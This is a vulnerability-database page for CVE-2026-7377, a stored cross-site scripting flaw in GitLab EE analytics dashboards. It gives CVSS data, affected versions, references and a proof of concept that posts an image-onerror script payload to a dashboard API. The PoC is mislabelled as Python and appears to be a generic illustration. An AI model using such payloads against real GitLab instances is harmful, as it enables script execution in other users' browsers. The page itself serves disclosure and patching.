CVE-2026-7377

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 18.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that, in customizable analytics dashboards, could have allowed an authenticated user to execute arbitrary JavaScript in the context of other users' browsers due to improper input sanitization.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

GitLab EE >= 18.7, < 18.9.7

GitLab EE >= 18.10, < 18.10.6

GitLab EE >= 18.11, < 18.11.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-7377: Stored XSS in Customizable Analytics Dashboards
// Attacker injects this payload into a customizable dashboard field.
// When a victim views the dashboard, the script executes.

// Payload to be injected into a dashboard configuration field (e.g., visualization title or content)
var maliciousPayload = '<img src=x onerror=alert(\'CVE-2026-7377_XSS\')>';

// Example request simulation
fetch('/api/v4/analytics/dashboards', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <ATTACKER_TOKEN>'
  },
  body: JSON.stringify({
    'name': 'Public Stats',
    'description': 'Overview of project metrics',
    'widgets': [
      {
        'type': 'text',
        'content': maliciousPayload // Injecting the XSS payload here
      }
    ]
  })
});

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7377
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7377
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7377/
[4] VulDB https://vuldb.com/cve/CVE-2026-7377
[5] https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/work_items/598497
[7] https://hackerone.com/reports/3659044

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7377", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:25.267", "lastModified": "2026-05-14T16:20:43.240", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that, in customizable analytics dashboards, could have allowed an authenticated user to execute arbitrary JavaScript in the context of other users' browsers due to improper input sanitization."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/598497", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/3659044", "source": "[email protected]"}]}}